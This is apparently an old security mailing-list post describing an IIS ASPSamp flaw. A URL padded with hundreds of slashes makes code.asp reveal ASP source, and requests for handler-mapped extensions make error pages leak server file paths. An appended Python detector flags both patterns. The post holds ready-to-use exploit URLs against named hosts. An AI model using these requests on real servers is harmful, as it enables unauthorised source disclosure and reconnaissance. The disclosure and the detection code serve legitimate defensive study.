http://ieak.microsoft.com/ASPSamp/Samples/code.asp?source=/ASPSamp///////Samples/hello.asp
* replace //////// with a few hundred forward slashes
Looks like any IIS server with the ASPSamp directory installed is
vulnerable
(or ASPs that take file paths as input).
And something else... I notice handler-mapped file extensions
reveal system file paths for web directories.
i.e.: try (.idq, .idc, .stm, .pl, .cgi) depending on what is mapped.
Example: http://www.microsoft.com/badidea.stm
Returns "Error processing SSI file 'd:\http\badidea.stm'"
____________________________________________________________________
Dave Edis http://www.edis.org/
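
Added example, not part of the original post: a defender-side check that flags request targets whose query parameters carry long runs of slashes, and response bodies that disclose local filesystem paths like the SSI error quoted above. The function names, the slash-run threshold of 8, and the sample requests are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample data (not taken from any real server log).
SAMPLE_REQUESTS = [
    "/ASPSamp/Samples/code.asp?source=/ASPSamp/Samples/hello.asp",
    "/ASPSamp/Samples/code.asp?source=/ASPSamp/" + "/" * 300 + "Samples/hello.asp",
    "/default.asp?page=news",
]
SAMPLE_BODIES = [
    "Error processing SSI file 'd:\\http\\badidea.stm'",  # error text quoted in the post
    "<html><body>404 Not Found</body></html>",
]

# Assumption: 8 or more consecutive separators never occur in legitimate paths.
SLASH_RUN = re.compile(r"[/\\]{8,}")
# Drive letter, colon, backslash, then path characters up to a quote or space.
LOCAL_PATH = re.compile(r"\b[A-Za-z]:\\[^\s'\"<>]+")


def suspicious_path_params(request_target):
    """Return the names of query parameters whose value holds a long slash run."""
    query = urlsplit(request_target).query
    params = parse_qs(query, keep_blank_values=True)
    return sorted(
        name for name, values in params.items()
        if any(SLASH_RUN.search(value) for value in values)
    )


def leaked_paths(body):
    """Return local filesystem paths disclosed in a response body."""
    return LOCAL_PATH.findall(body)


if __name__ == "__main__":
    for target in SAMPLE_REQUESTS:
        flagged = suspicious_path_params(target)
        if flagged:
            print("slash run in parameter(s):", ", ".join(flagged))
    for body in SAMPLE_BODIES:
        for path in leaked_paths(body):
            print("response discloses path:", path)
```
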